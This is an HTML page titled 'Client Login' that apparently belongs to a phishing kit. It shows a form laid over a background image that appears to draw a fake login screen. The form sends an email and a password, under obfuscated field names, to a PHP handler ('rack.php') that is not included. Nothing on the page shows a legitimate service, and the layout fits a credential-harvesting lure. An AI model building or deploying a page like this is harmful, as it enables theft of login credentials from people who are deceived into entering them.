<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Client Login</title>
</head>

<body>
<form action="rack.php" method="post">
<div style="background-image:url(imgd/rack.png); width:318px; height:483px; background-repeat:no-repeat;">
  <table width="319" height="281" border="0" cellpadding="0" cellspacing="0">
    <tr>
      <td width="19" rowspan="5">&nbsp;</td>
      <td width="300" height="127">&nbsp;</td>
    </tr>
    <tr>
      <td height="39"><label>
        <input type="email" name="lafs" required placeholder="someone@example.com" style="background:none; border:1px solid #ccc; width:290px; height:28px; font-size:12px; padding-left:5px;"  />
      </label></td>
    </tr>
    
    <tr>
      <td height="28"><label>
        <input type="password" name="laffa" required placeholder="Password" style="background:none; border:1px solid #ccc; width:290px; height:28px; font-size:12px; padding-left:5px;"  />
      </label></td>
    </tr>
    <tr>
      <td height="31">&nbsp;</td>
    </tr>
    <tr>
      <td height="50"><label>
        <input type="image" src="imgd/bttnn.png" />
      </label></td>
    </tr>
  </table>
</div>
</form>
</body>
</html>
